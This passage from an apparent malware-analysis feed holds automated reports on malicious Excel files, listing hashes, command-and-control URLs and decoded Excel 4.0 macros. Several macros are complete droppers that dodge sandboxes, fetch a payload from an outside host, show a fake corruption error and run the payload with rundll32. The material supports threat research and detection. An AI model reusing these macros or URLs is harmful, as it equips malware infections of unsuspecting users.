problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"863b8d0b8ca52bf00111727d5446d98b695739ab927f75d263449b8974fb4f74"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"863b8d0b8ca52bf00111727d5446d98b695739ab927f75d263449b8974fb4f74","filesize":185344,"md5":"e6dbbb3113e14bd59c2a39ce4af5e00b","sha1":"b1753b3e9125dc97149d629648f067e9fd94f50c","sha256":"863b8d0b8ca52bf00111727d5446d98b695739ab927f75d263449b8974fb4f74","sha512":"179631b986f8991f932b6ab73bea2e06827681a01467e2e95fa4e7bade340551dafcf21d48d94b07139ebbab4442c5673afebb9aec8e41c7ca15533be9e52429","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"863b8d0b8ca52bf00111727d5446d98b695739ab927f75d263449b8974fb4f74.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8646b358977757993ea146caf4aae99decff043ce0fc6a950fc388de479a23d6"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"8646b358977757993ea146caf4aae99decff043ce0fc6a950fc388de479a23d6","filesize":144384,"md5":"c5f3ed94e5f8623476cd62d4fd6234b6","sha1":"645da25e91184bbe8dd814fe6d066307a767730d","sha256":"8646b358977757993ea146caf4aae99decff043ce0fc6a950fc388de479a23d6","sha512":"7bf8e914e0c0927a97ee3735ecbe37e777ad0d5940a765f30f1acbe64d27c7230852d2003ae327c51f984c0177f598346bba84e1fcffc24d2f7df6cb0421933e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8646b358977757993ea146caf4aae99decff043ce0fc6a950fc388de479a23d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"q5XUPqcSjP\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"865cbb865b413bfc4a24713739c07d22ae1beb628ce337495bd05825ed6b5333"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"865cbb865b413bfc4a24713739c07d22ae1beb628ce337495bd05825ed6b5333","filesize":112128,"md5":"ec0d506a8979afaab34983b0c7d454a4","sha1":"f5778b62a7c921a72996f7cf927ff5f93e71a1d2","sha256":"865cbb865b413bfc4a24713739c07d22ae1beb628ce337495bd05825ed6b5333","sha512":"f83d4f2e57cf6ea070f2d1bb65f7b128a5f0c78008291e9b839aa3f55b0a3acce7135285bee1d602b400e55a25f8cd238d421be4a3d29e1e85b2f5d593c3634a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"865cbb865b413bfc4a24713739c07d22ae1beb628ce337495bd05825ed6b5333.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"866a950188adeae63b22f5641ce8cdb0673c8418d1d57dac79409afd8ac40c91"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"866a950188adeae63b22f5641ce8cdb0673c8418d1d57dac79409afd8ac40c91","filesize":225280,"md5":"beeba1ac8bc8d50abdc71e00b0346565","sha1":"9dc0ade3c31e7293ba8f77ece46f97aeb6e19a26","sha256":"866a950188adeae63b22f5641ce8cdb0673c8418d1d57dac79409afd8ac40c91","sha512":"e1632dd33f02d186d6b8ef7978fb007f1aad8033e149e226042df3041ed984d6f0cd76ddc1689d1bd35f611c497e9ba8f905102e3701e59409576349370dad43","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"866a950188adeae63b22f5641ce8cdb0673c8418d1d57dac79409afd8ac40c91.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6iorHW1DKz\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"86747620b3ebf7e168e1273e4292e13223699825c62c5d1da747cb62ceb7121c"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"86747620b3ebf7e168e1273e4292e13223699825c62c5d1da747cb62ceb7121c","filesize":185344,"md5":"73019bdbc86d3bcc3d59b7fa45229321","sha1":"195ef91da54f001d6a6932b1495868384ed1d68f","sha256":"86747620b3ebf7e168e1273e4292e13223699825c62c5d1da747cb62ceb7121c","sha512":"1cfea489f0979aeef4bf244b350d86adaff3bd940819efc7cb7d0d455938969807d18d127d9fff95d7f500860cdc8729529e9d26642fec4c2c4bc056d522fce4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"86747620b3ebf7e168e1273e4292e13223699825c62c5d1da747cb62ceb7121c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"867a9d132f7affad7f8bcbc17105ac3b0f85345ffb60ff4cd342fea64773006b"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"867a9d132f7affad7f8bcbc17105ac3b0f85345ffb60ff4cd342fea64773006b","filesize":206336,"md5":"2b42a247e7cc8a174fa085b2f9b3dbea","sha1":"ce6408b110e831df1ca955c8e139eda2620dda4d","sha256":"867a9d132f7affad7f8bcbc17105ac3b0f85345ffb60ff4cd342fea64773006b","sha512":"6f843b8ac19bb9f623a6841f27e0c1d58f77eac113efc874480654323a0c66a7045d265039a27f32ec1a4636a2f4f826c2be58f7cfd98e7e91765eee85bcd099","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"867a9d132f7affad7f8bcbc17105ac3b0f85345ffb60ff4cd342fea64773006b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BwFU8V1UsR\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"868eee7a745d133cab84539ab3146447a783983e6cc6a4f29cc1501c3d84457b"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"868eee7a745d133cab84539ab3146447a783983e6cc6a4f29cc1501c3d84457b","filesize":142848,"md5":"d2d51361aac749514c5c89868d8b8e6d","sha1":"4dad9c47598cf64664f988b7c46d856338778472","sha256":"868eee7a745d133cab84539ab3146447a783983e6cc6a4f29cc1501c3d84457b","sha512":"1c42d5d01c978d1e41b34bdf187684a2f11979eb3d8d8fd6d345fa0d06b1dc1fa27ba8c384839d6bf3d096b6477b0faf0bb6b4d29a6fdad17780c64210f0990d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"868eee7a745d133cab84539ab3146447a783983e6cc6a4f29cc1501c3d84457b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"vxgrApntZF\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"86992abe01076ea82e208f8873f531e26ba0c19dae7ce735089dfabcbf841a3e"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"86992abe01076ea82e208f8873f531e26ba0c19dae7ce735089dfabcbf841a3e","filesize":152576,"md5":"8ba8fee0004a11559c6149d6121032ca","sha1":"ef9b71060ff6c27a80a809ee05a997b59a343a3d","sha256":"86992abe01076ea82e208f8873f531e26ba0c19dae7ce735089dfabcbf841a3e","sha512":"f865876c963b0c0919a21176ddfbff9898f8d583e21c7b80b3590da82a59b60fa72f5ed31393e36d8a5ebeeba445e313376c30700cce86ac59812225fdc9f52e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"86992abe01076ea82e208f8873f531e26ba0c19dae7ce735089dfabcbf841a3e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OQrGBClNmR\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"86a85d337cfa2b2281df1f70d3163c4a5b5272355f612f973cf111538360fd3c"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"86a85d337cfa2b2281df1f70d3163c4a5b5272355f612f973cf111538360fd3c","filesize":160768,"md5":"1555f34a35185ca9f211b9fc93ffeff0","sha1":"3564293829834e9c289660845911ba75753a97f1","sha256":"86a85d337cfa2b2281df1f70d3163c4a5b5272355f612f973cf111538360fd3c","sha512":"fb7392bb6d7baa1c165571f97a1b71939c3bef645a372edf76e37902ba21d6b155372eed0c606bf8a35d64b3cde4d574b657418d9c68b485038e7fe8c10d6264","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"86a85d337cfa2b2281df1f70d3163c4a5b5272355f612f973cf111538360fd3c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LeN6sf2Qbs\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"86a96a10031b925df3b447a6aa6c22063958e8f9f58b3913253a06bf824e9eae"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"86a96a10031b925df3b447a6aa6c22063958e8f9f58b3913253a06bf824e9eae","filesize":228864,"md5":"bf91ff88fe20977cd7cf57091f0543f2","sha1":"2faca5a1f07085b3fe6dc28e36c400dff4ccfb08","sha256":"86a96a10031b925df3b447a6aa6c22063958e8f9f58b3913253a06bf824e9eae","sha512":"931dd18b61cdb75a15e881a93a74179713655fcf80370f81f6d97d9ebf5b7abf3779bfcac48bdce126f4e9cb463d0d69b7510fd2bc344864dfd964b4180cd4ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"86a96a10031b925df3b447a6aa6c22063958e8f9f58b3913253a06bf824e9eae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k0R8EVBkuq\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"86bcf8a3e83919bf7227a1e1f677a771915b1fc4971c8f68b2a9e35c98863bcc"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"86bcf8a3e83919bf7227a1e1f677a771915b1fc4971c8f68b2a9e35c98863bcc","filesize":206336,"md5":"a34502fe539a9a5500831f2eb1557ab2","sha1":"f137f608955cd7b858c65adab930ca2ba674d838","sha256":"86bcf8a3e83919bf7227a1e1f677a771915b1fc4971c8f68b2a9e35c98863bcc","sha512":"5a5582e5c18e108e25f6d79885c6cb1ac71b927f2251837055fde2b105c5e54b081809acdd006906db625b37cb33caedff572ed19f5e5578e642e2148e595992","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"86bcf8a3e83919bf7227a1e1f677a771915b1fc4971c8f68b2a9e35c98863bcc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"K4qvhmB2Sq\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"86f244ee8a69a1651885da4aa397ea2f67632b0ff33e37d9b22c2ab74b61fe5a"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"86f244ee8a69a1651885da4aa397ea2f67632b0ff33e37d9b22c2ab74b61fe5a","filesize":185344,"md5":"6dbe4d902c7f86d114177f266014f51a","sha1":"1a256a7566dd8df383aa68ffff16d23142705c21","sha256":"86f244ee8a69a1651885da4aa397ea2f67632b0ff33e37d9b22c2ab74b61fe5a","sha512":"222e3d7235b1762ab10f13b8ff68d86d887a3c3cb6728da8f73d6d3525a8dcbb740a11a703a81791334c2e02a57f3cf1db44c836a8fe2d238c4e9e50ca8669a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"86f244ee8a69a1651885da4aa397ea2f67632b0ff33e37d9b22c2ab74b61fe5a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"86f9e6122828d461cf1449bd708e4278d4edd18b4ef51533208c4fd13de9df02"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"86f9e6122828d461cf1449bd708e4278d4edd18b4ef51533208c4fd13de9df02","filesize":116224,"md5":"c4a6fb4e42246c55c40f577ff1a1e4d9","sha1":"01fcbf469e6936f8e03b33628df9842ba9db7ae7","sha256":"86f9e6122828d461cf1449bd708e4278d4edd18b4ef51533208c4fd13de9df02","sha512":"55fec3157233f3cc0c3f89632723d0f521f65055f11036203f380e883d3b4501fdd6d1821f00469b3a6391d22c8a9b36fd4e879dd20438eeb31de06fd7fd1753","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"86f9e6122828d461cf1449bd708e4278d4edd18b4ef51533208c4fd13de9df02.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1hRBXBj1wU\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8701d298bf906730955fbd98aebde147c5dd4f122f9c664155a32ddaaaef4698"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"8701d298bf906730955fbd98aebde147c5dd4f122f9c664155a32ddaaaef4698","filesize":104448,"md5":"b9b0a17f638fc0ae51c15bbe58fdbded","sha1":"2beea81a2bc34317165f02769681fdab17fe9028","sha256":"8701d298bf906730955fbd98aebde147c5dd4f122f9c664155a32ddaaaef4698","sha512":"7c72ca7e772f7722b33e2378a75f93689e4c75ada0d22afe37cee2daaea5e9a9a3e0ee7dae0a7c29807cb4e4c6b6bdf5bbe5e54e3c73057134f021a93c07815e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8701d298bf906730955fbd98aebde147c5dd4f122f9c664155a32ddaaaef4698.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"IfNfzRURbG\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"870ad44b7d2a3e0a8b86dede0c63cda2ec5a2b6915d76488ed264e6534c232e4"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"870ad44b7d2a3e0a8b86dede0c63cda2ec5a2b6915d76488ed264e6534c232e4","filesize":168960,"md5":"c8cd22482898d160e60b244c528cdc79","sha1":"6fcc69fd769f73b9fa7f84a7f523c7554ae12c09","sha256":"870ad44b7d2a3e0a8b86dede0c63cda2ec5a2b6915d76488ed264e6534c232e4","sha512":"e03bfae07741cec25367d7b0202eecebf4306fc262de54097d7cc59ba20bd0d55179f798cb650091619a3caa18a7e28043eb64f0f73bac867a2b1e1adf6f1116","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"870ad44b7d2a3e0a8b86dede0c63cda2ec5a2b6915d76488ed264e6534c232e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0penEH4ErF\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8719ae7a14f091202f65f4c638592951fe850cc5e54e98c306c8d69646da2562"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"8719ae7a14f091202f65f4c638592951fe850cc5e54e98c306c8d69646da2562","filesize":112128,"md5":"f766d219e90051b5c203ff4968482948","sha1":"344890ac06e7ef5133a678e6952401464aa5445a","sha256":"8719ae7a14f091202f65f4c638592951fe850cc5e54e98c306c8d69646da2562","sha512":"4d9bee99322e78d89f909ebe2976cab9ae931e91700aac7e1192a36c43a6ada4cc62b8c4efdf99662e6b0ecdef6ab779a68ae93e6966cb70d5a32e20d92c2c92","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8719ae7a14f091202f65f4c638592951fe850cc5e54e98c306c8d69646da2562.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 